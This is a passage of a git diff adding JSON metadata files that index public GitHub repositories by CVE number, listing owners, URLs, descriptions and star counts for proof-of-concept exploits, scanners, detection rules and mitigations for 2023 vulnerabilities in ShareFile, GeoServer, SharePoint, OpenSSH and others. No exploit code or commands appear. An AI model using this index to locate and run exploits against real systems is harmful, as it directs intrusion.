+ },
+ {
+ "id": 662260047,
+ "name": "CVE-2023-24488",
+ "full_name": "securitycipher\/CVE-2023-24488",
+ "owner": {
+ "login": "securitycipher",
+ "id": 111536600,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/111536600?v=4",
+ "html_url": "https:\/\/github.com\/securitycipher"
+ },
+ "html_url": "https:\/\/github.com\/securitycipher\/CVE-2023-24488",
+ "description": "POC for CVE-2023-24488",
+ "fork": false,
+ "created_at": "2023-07-04T18:02:50Z",
+ "updated_at": "2024-06-10T10:19:46Z",
+ "pushed_at": "2023-07-04T18:39:03Z",
+ "stargazers_count": 12,
+ "watchers_count": 12,
+ "has_discussions": false,
+ "forks_count": 4,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 4,
+ "watchers": 12,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 663114176,
+ "name": "CVE-2023-24488-SIEM-Sigma-Rule",
+ "full_name": "NSTCyber\/CVE-2023-24488-SIEM-Sigma-Rule",
+ "owner": {
+ "login": "NSTCyber",
+ "id": 128680605,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/128680605?v=4",
+ "html_url": "https:\/\/github.com\/NSTCyber"
+ },
+ "html_url": "https:\/\/github.com\/NSTCyber\/CVE-2023-24488-SIEM-Sigma-Rule",
+ "description": "Detect CVE-2023-24488 Exploitation Attempts",
+ "fork": false,
+ "created_at": "2023-07-06T15:23:45Z",
+ "updated_at": "2024-04-20T01:39:03Z",
+ "pushed_at": "2023-07-06T16:32:44Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 672880378,
+ "name": "CVE-2023-24488",
+ "full_name": "raytheon0x21\/CVE-2023-24488",
+ "owner": {
+ "login": "raytheon0x21",
+ "id": 92903333,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/92903333?v=4",
+ "html_url": "https:\/\/github.com\/raytheon0x21"
+ },
+ "html_url": "https:\/\/github.com\/raytheon0x21\/CVE-2023-24488",
+ "description": "Tools to perform exploit CVE-2023-24488",
+ "fork": false,
+ "created_at": "2023-07-31T11:29:16Z",
+ "updated_at": "2023-08-27T15:14:52Z",
+ "pushed_at": "2023-07-31T11:37:58Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2023-24488"
+ ],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-24489.json b/2023/CVE-2023-24489.json
new file mode 100644
index 0000000000..f3ffe31e34
--- /dev/null
+++ b/2023/CVE-2023-24489.json
@@ -0,0 +1,62 @@
+[
+ {
+ "id": 665550383,
+ "name": "CVE-2023-24489-ShareFile",
+ "full_name": "adhikara13\/CVE-2023-24489-ShareFile",
+ "owner": {
+ "login": "adhikara13",
+ "id": 44716348,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44716348?v=4",
+ "html_url": "https:\/\/github.com\/adhikara13"
+ },
+ "html_url": "https:\/\/github.com\/adhikara13\/CVE-2023-24489-ShareFile",
+ "description": "This project is a Python script that exploits the CVE-2023-24489 vulnerability in ShareFile. It allows remote command execution on the target server. The script supports both Windows and Linux (On testing) platforms, and it can be used to exploit individual targets or perform mass checking on a list of URLs.",
+ "fork": false,
+ "created_at": "2023-07-12T13:01:33Z",
+ "updated_at": "2024-03-27T17:14:07Z",
+ "pushed_at": "2023-07-12T13:17:54Z",
+ "stargazers_count": 12,
+ "watchers_count": 12,
+ "has_discussions": false,
+ "forks_count": 4,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 4,
+ "watchers": 12,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 683690698,
+ "name": "CVE-2023-24489-poc",
+ "full_name": "whalebone7\/CVE-2023-24489-poc",
+ "owner": {
+ "login": "whalebone7",
+ "id": 125891350,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/125891350?v=4",
+ "html_url": "https:\/\/github.com\/whalebone7"
+ },
+ "html_url": "https:\/\/github.com\/whalebone7\/CVE-2023-24489-poc",
+ "description": "POC for CVE-2023-24489 with bash. ",
+ "fork": false,
+ "created_at": "2023-08-27T11:53:59Z",
+ "updated_at": "2023-10-22T21:09:08Z",
+ "pushed_at": "2023-08-27T11:59:59Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-24517.json b/2023/CVE-2023-24517.json
new file mode 100644
index 0000000000..da6a2cab09
--- /dev/null
+++ b/2023/CVE-2023-24517.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 705272522,
+ "name": "CVE-2023-24517",
+ "full_name": "Argonx21\/CVE-2023-24517",
+ "owner": {
+ "login": "Argonx21",
+ "id": 30073895,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/30073895?v=4",
+ "html_url": "https:\/\/github.com\/Argonx21"
+ },
+ "html_url": "https:\/\/github.com\/Argonx21\/CVE-2023-24517",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-10-15T14:55:12Z",
+ "updated_at": "2023-10-15T14:55:13Z",
+ "pushed_at": "2023-10-15T14:55:13Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-24538.json b/2023/CVE-2023-24538.json
new file mode 100644
index 0000000000..e639e557c2
--- /dev/null
+++ b/2023/CVE-2023-24538.json
@@ -0,0 +1,62 @@
+[
+ {
+ "id": 698127324,
+ "name": "goIssue_dunfell",
+ "full_name": "skulkarni-mv\/goIssue_dunfell",
+ "owner": {
+ "login": "skulkarni-mv",
+ "id": 117360244,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/117360244?v=4",
+ "html_url": "https:\/\/github.com\/skulkarni-mv"
+ },
+ "html_url": "https:\/\/github.com\/skulkarni-mv\/goIssue_dunfell",
+ "description": "go CVE-2023-24538 patch issue resolver - Dunfell",
+ "fork": false,
+ "created_at": "2023-09-29T08:09:17Z",
+ "updated_at": "2023-09-29T08:20:21Z",
+ "pushed_at": "2023-10-04T05:29:12Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 698334254,
+ "name": "goIssue_kirkstone",
+ "full_name": "skulkarni-mv\/goIssue_kirkstone",
+ "owner": {
+ "login": "skulkarni-mv",
+ "id": 117360244,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/117360244?v=4",
+ "html_url": "https:\/\/github.com\/skulkarni-mv"
+ },
+ "html_url": "https:\/\/github.com\/skulkarni-mv\/goIssue_kirkstone",
+ "description": "go CVE-2023-24538 patch issue resolver - Kirkstone",
+ "fork": false,
+ "created_at": "2023-09-29T17:18:42Z",
+ "updated_at": "2023-09-29T17:22:44Z",
+ "pushed_at": "2023-09-29T17:23:13Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-24706.json b/2023/CVE-2023-24706.json
new file mode 100644
index 0000000000..24f1fb7239
--- /dev/null
+++ b/2023/CVE-2023-24706.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 716903745,
+ "name": "CVE-2023-24706",
+ "full_name": "hatjwe\/CVE-2023-24706",
+ "owner": {
+ "login": "hatjwe",
+ "id": 42887236,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42887236?v=4",
+ "html_url": "https:\/\/github.com\/hatjwe"
+ },
+ "html_url": "https:\/\/github.com\/hatjwe\/CVE-2023-24706",
+ "description": "CVE-2023-24706",
+ "fork": false,
+ "created_at": "2023-11-10T05:43:52Z",
+ "updated_at": "2023-11-10T05:50:25Z",
+ "pushed_at": "2023-11-10T05:50:21Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-24871.json b/2023/CVE-2023-24871.json
new file mode 100644
index 0000000000..92ee46c63a
--- /dev/null
+++ b/2023/CVE-2023-24871.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 818310581,
+ "name": "CVE-2023-24871",
+ "full_name": "ynwarcs\/CVE-2023-24871",
+ "owner": {
+ "login": "ynwarcs",
+ "id": 108408574,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/108408574?v=4",
+ "html_url": "https:\/\/github.com\/ynwarcs"
+ },
+ "html_url": "https:\/\/github.com\/ynwarcs\/CVE-2023-24871",
+ "description": "pocs & exploit for CVE-2023-24871 (rce + lpe)",
+ "fork": false,
+ "created_at": "2024-06-21T15:01:15Z",
+ "updated_at": "2024-06-26T06:10:26Z",
+ "pushed_at": "2024-06-25T15:33:32Z",
+ "stargazers_count": 15,
+ "watchers_count": 15,
+ "has_discussions": false,
+ "forks_count": 5,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 5,
+ "watchers": 15,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-24932.json b/2023/CVE-2023-24932.json
new file mode 100644
index 0000000000..e4e0eabaf8
--- /dev/null
+++ b/2023/CVE-2023-24932.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 805008847,
+ "name": "Invoke-BlackLotusMitigation",
+ "full_name": "ChristelVDH\/Invoke-BlackLotusMitigation",
+ "owner": {
+ "login": "ChristelVDH",
+ "id": 3036044,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3036044?v=4",
+ "html_url": "https:\/\/github.com\/ChristelVDH"
+ },
+ "html_url": "https:\/\/github.com\/ChristelVDH\/Invoke-BlackLotusMitigation",
+ "description": "scripted CVE-2023-24932 mitigation guide",
+ "fork": false,
+ "created_at": "2024-05-23T17:49:17Z",
+ "updated_at": "2024-05-24T06:15:11Z",
+ "pushed_at": "2024-05-24T06:15:07Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-24955.json b/2023/CVE-2023-24955.json
new file mode 100644
index 0000000000..d32c73f9f7
--- /dev/null
+++ b/2023/CVE-2023-24955.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 736570933,
+ "name": "CVE-2023-24955-PoC",
+ "full_name": "former-farmer\/CVE-2023-24955-PoC",
+ "owner": {
+ "login": "former-farmer",
+ "id": 151993362,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/151993362?v=4",
+ "html_url": "https:\/\/github.com\/former-farmer"
+ },
+ "html_url": "https:\/\/github.com\/former-farmer\/CVE-2023-24955-PoC",
+ "description": "Exploit for Microsoft SharePoint 2019",
+ "fork": false,
+ "created_at": "2023-12-28T09:08:47Z",
+ "updated_at": "2024-06-20T13:46:56Z",
+ "pushed_at": "2023-12-28T10:02:02Z",
+ "stargazers_count": 10,
+ "watchers_count": 10,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 10,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-25136.json b/2023/CVE-2023-25136.json
new file mode 100644
index 0000000000..8ecd45a8c3
--- /dev/null
+++ b/2023/CVE-2023-25136.json
@@ -0,0 +1,62 @@
+[
+ {
+ "id": 687169714,
+ "name": "CVE-2023-25136",
+ "full_name": "Business1sg00d\/CVE-2023-25136",
+ "owner": {
+ "login": "Business1sg00d",
+ "id": 112768445,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/112768445?v=4",
+ "html_url": "https:\/\/github.com\/Business1sg00d"
+ },
+ "html_url": "https:\/\/github.com\/Business1sg00d\/CVE-2023-25136",
+ "description": "Looking into the memory when sshd 9.1p1 aborts due to a double free bug.",
+ "fork": false,
+ "created_at": "2023-09-04T19:28:43Z",
+ "updated_at": "2023-10-21T09:31:07Z",
+ "pushed_at": "2023-09-08T17:49:47Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 694642627,
+ "name": "CVE-2023-25136",
+ "full_name": "malvika-thakur\/CVE-2023-25136",
+ "owner": {
+ "login": "malvika-thakur",
+ "id": 60217652,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/60217652?v=4",
+ "html_url": "https:\/\/github.com\/malvika-thakur"
+ },
+ "html_url": "https:\/\/github.com\/malvika-thakur\/CVE-2023-25136",
+ "description": "OpenSSH Pre-Auth Double Free CVE-2023-25136 – Writeup and Proof-of-Concept",
+ "fork": false,
+ "created_at": "2023-09-21T12:05:35Z",
+ "updated_at": "2024-02-21T16:24:14Z",
+ "pushed_at": "2023-09-21T12:35:55Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-25157.json b/2023/CVE-2023-25157.json
new file mode 100644
index 0000000000..44a725c7ae
--- /dev/null
+++ b/2023/CVE-2023-25157.json
@@ -0,0 +1,79 @@
+[
+ {
+ "id": 672729005,
+ "name": "CVE-2023-25157",
+ "full_name": "Rubikcuv5\/CVE-2023-25157",
+ "owner": {
+ "login": "Rubikcuv5",
+ "id": 47946047,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/47946047?v=4",
+ "html_url": "https:\/\/github.com\/Rubikcuv5"
+ },
+ "html_url": "https:\/\/github.com\/Rubikcuv5\/CVE-2023-25157",
+ "description": " GeoServer OGC Filter SQL Injection Vulnerabilities",
+ "fork": false,
+ "created_at": "2023-07-31T03:10:41Z",
+ "updated_at": "2023-07-31T19:38:13Z",
+ "pushed_at": "2023-07-31T22:44:42Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 724490342,
+ "name": "Geoserver-CVE-2023-25157",
+ "full_name": "dr-cable-tv\/Geoserver-CVE-2023-25157",
+ "owner": {
+ "login": "dr-cable-tv",
+ "id": 152005084,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/152005084?v=4",
+ "html_url": "https:\/\/github.com\/dr-cable-tv"
+ },
+ "html_url": "https:\/\/github.com\/dr-cable-tv\/Geoserver-CVE-2023-25157",
+ "description": "Geoserver SQL Injection Exploit",
+ "fork": false,
+ "created_at": "2023-11-28T07:23:00Z",
+ "updated_at": "2024-02-06T04:27:04Z",
+ "pushed_at": "2023-11-28T10:07:24Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cql",
+ "cve-2023-25157",
+ "exploit",
+ "geoserver",
+ "geotools",
+ "posgresql",
+ "postgres",
+ "python",
+ "python3",
+ "rce",
+ "rce-exploit",
+ "sql",
+ "sqli",
+ "vulner",
+ "vulnerability-detection",
+ "vulnerability-scanners"
+ ],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-25194.json b/2023/CVE-2023-25194.json
new file mode 100644
index 0000000000..56ecba16b7
--- /dev/null
+++ b/2023/CVE-2023-25194.json
@@ -0,0 +1,65 @@
+[
+ {
+ "id": 736497233,
+ "name": "CVE-2023-25194",
+ "full_name": "YongYe-Security\/CVE-2023-25194",
+ "owner": {
+ "login": "YongYe-Security",
+ "id": 90460865,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/90460865?v=4",
+ "html_url": "https:\/\/github.com\/YongYe-Security"
+ },
+ "html_url": "https:\/\/github.com\/YongYe-Security\/CVE-2023-25194",
+ "description": "CVE-2023-25194 Scan",
+ "fork": false,
+ "created_at": "2023-12-28T04:24:02Z",
+ "updated_at": "2023-12-29T09:06:55Z",
+ "pushed_at": "2023-12-28T04:33:45Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 787945502,
+ "name": "cve-2023-25194",
+ "full_name": "vulncheck-oss\/cve-2023-25194",
+ "owner": {
+ "login": "vulncheck-oss",
+ "id": 134310220,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/134310220?v=4",
+ "html_url": "https:\/\/github.com\/vulncheck-oss"
+ },
+ "html_url": "https:\/\/github.com\/vulncheck-oss\/cve-2023-25194",
+ "description": "A go-exploit for Apache Druid CVE-2023-25194",
+ "fork": false,
+ "created_at": "2024-04-17T13:36:34Z",
+ "updated_at": "2024-04-17T13:53:11Z",
+ "pushed_at": "2024-04-17T13:51:29Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2023-25194",
+ "go-exploit"
+ ],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-25202.json b/2023/CVE-2023-25202.json
new file mode 100644
index 0000000000..feb00a86d0
--- /dev/null
+++ b/2023/CVE-2023-25202.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 758395533,
+ "name": "CVE-2023-25202",
+ "full_name": "Trackflaw\/CVE-2023-25202",
+ "owner": {
+ "login": "Trackflaw",
+ "id": 78696986,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78696986?v=4",
+ "html_url": "https:\/\/github.com\/Trackflaw"
+ },
+ "html_url": "https:\/\/github.com\/Trackflaw\/CVE-2023-25202",
+ "description": "CVE-2023-25202: Insecure file upload mechanism",
+ "fork": false,
+ "created_at": "2024-02-16T08:22:48Z",
+ "updated_at": "2024-02-16T08:22:48Z",
+ "pushed_at": "2024-02-16T08:51:09Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-25203.json b/2023/CVE-2023-25203.json
new file mode 100644
index 0000000000..599ff1457c
--- /dev/null
+++ b/2023/CVE-2023-25203.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 758397806,
+ "name": "CVE-2023-25203",
+ "full_name": "Trackflaw\/CVE-2023-25203",
+ "owner": {
+ "login": "Trackflaw",
+ "id": 78696986,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78696986?v=4",
+ "html_url": "https:\/\/github.com\/Trackflaw"
+ },
+ "html_url": "https:\/\/github.com\/Trackflaw\/CVE-2023-25203",
+ "description": "CVE-2023-25203: Application Vulnerable to SSRF (Server Side Request Forgery) Attacks",
+ "fork": false,
+ "created_at": "2024-02-16T08:29:25Z",
+ "updated_at": "2024-02-16T08:29:25Z",
+ "pushed_at": "2024-02-16T08:50:53Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-2523.json b/2023/CVE-2023-2523.json
new file mode 100644
index 0000000000..37831dc78d
--- /dev/null
+++ b/2023/CVE-2023-2523.json
@@ -0,0 +1,62 @@
+[
+ {
+ "id": 683376877,
+ "name": "cve-2023-2523-and-cve-2023-2648",
+ "full_name": "bingtangbanli\/cve-2023-2523-and-cve-2023-2648",
+ "owner": {
+ "login": "bingtangbanli",
+ "id": 77956516,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/77956516?v=4",
+ "html_url": "https:\/\/github.com\/bingtangbanli"
+ },
+ "html_url": "https:\/\/github.com\/bingtangbanli\/cve-2023-2523-and-cve-2023-2648",
+ "description": "cve-2023-2523-and-cve-2023-2648",
+ "fork": false,
+ "created_at": "2023-08-26T11:23:58Z",
+ "updated_at": "2024-02-02T03:20:29Z",
+ "pushed_at": "2023-08-26T15:35:20Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 696169058,
+ "name": "CVE-2023-2523",
+ "full_name": "Any3ite\/CVE-2023-2523",
+ "owner": {
+ "login": "Any3ite",
+ "id": 20638313,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20638313?v=4",
+ "html_url": "https:\/\/github.com\/Any3ite"
+ },
+ "html_url": "https:\/\/github.com\/Any3ite\/CVE-2023-2523",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-09-25T08:21:06Z",
+ "updated_at": "2023-09-25T17:19:35Z",
+ "pushed_at": "2023-09-25T08:25:08Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-25690.json b/2023/CVE-2023-25690.json
new file mode 100644
index 0000000000..9ddf7f2bc9
--- /dev/null
+++ b/2023/CVE-2023-25690.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 727337033,
+ "name": "CVE-2023-25690",
+ "full_name": "thanhlam-attt\/CVE-2023-25690",
+ "owner": {
+ "login": "thanhlam-attt",
+ "id": 79523444,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79523444?v=4",
+ "html_url": "https:\/\/github.com\/thanhlam-attt"
+ },
+ "html_url": "https:\/\/github.com\/thanhlam-attt\/CVE-2023-25690",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-12-04T16:58:53Z",
+ "updated_at": "2024-02-16T07:38:48Z",
+ "pushed_at": "2023-12-05T16:04:42Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-25725.json b/2023/CVE-2023-25725.json
new file mode 100644
index 0000000000..3937c3218a
--- /dev/null
+++ b/2023/CVE-2023-25725.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 681930748,
+ "name": "LAB-CVE-2023-25725",
+ "full_name": "sgwgsw\/LAB-CVE-2023-25725",
+ "owner": {
+ "login": "sgwgsw",
+ "id": 43614862,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/43614862?v=4",
+ "html_url": "https:\/\/github.com\/sgwgsw"
+ },
+ "html_url": "https:\/\/github.com\/sgwgsw\/LAB-CVE-2023-25725",
+ "description": "Lab environment to test CVE-2023-25725",
+ "fork": false,
+ "created_at": "2023-08-23T04:32:54Z",
+ "updated_at": "2023-08-23T16:53:12Z",
+ "pushed_at": "2023-08-23T17:02:46Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-25813.json b/2023/CVE-2023-25813.json
new file mode 100644
index 0000000000..59c37a212e
--- /dev/null
+++ b/2023/CVE-2023-25813.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 789840283,
+ "name": "Sequelize-1day-CVE-2023-25813",
+ "full_name": "bde574786\/Sequelize-1day-CVE-2023-25813",
+ "owner": {
+ "login": "bde574786",
+ "id": 102010541,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102010541?v=4",
+ "html_url": "https:\/\/github.com\/bde574786"
+ },
+ "html_url": "https:\/\/github.com\/bde574786\/Sequelize-1day-CVE-2023-25813",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-04-21T17:39:05Z",
+ "updated_at": "2024-04-28T03:51:43Z",
+ "pushed_at": "2024-04-28T03:51:40Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-25950.json b/2023/CVE-2023-25950.json
new file mode 100644
index 0000000000..77e89fdb52
--- /dev/null
+++ b/2023/CVE-2023-25950.json
@@ -0,0 +1,41 @@
+[
+ {
+ "id": 673126374,
+ "name": "HTTP3ONSTEROIDS",
+ "full_name": "dhmosfunk\/HTTP3ONSTEROIDS",
+ "owner": {
+ "login": "dhmosfunk",
+ "id": 45040001,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45040001?v=4",
+ "html_url": "https:\/\/github.com\/dhmosfunk"
+ },
+ "html_url": "https:\/\/github.com\/dhmosfunk\/HTTP3ONSTEROIDS",
+ "description": "HTTP3ONSTEROIDS - A research on CVE-2023-25950 where HAProxy's HTTP\/3 implementation fails to block a malformed HTTP header field name.",
+ "fork": false,
+ "created_at": "2023-07-31T23:57:02Z",
+ "updated_at": "2024-04-03T09:08:33Z",
+ "pushed_at": "2024-02-10T04:30:45Z",
+ "stargazers_count": 10,
+ "watchers_count": 10,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2023-25950",
+ "cve-2023-25950-poc",
+ "dos",
+ "haproxy",
+ "http-request-smuggling",
+ "http3",
+ "http3onsteroids",
+ "poc"
+ ],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 10,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-2598.json b/2023/CVE-2023-2598.json
new file mode 100644
index 0000000000..f9206ab7c2
--- /dev/null
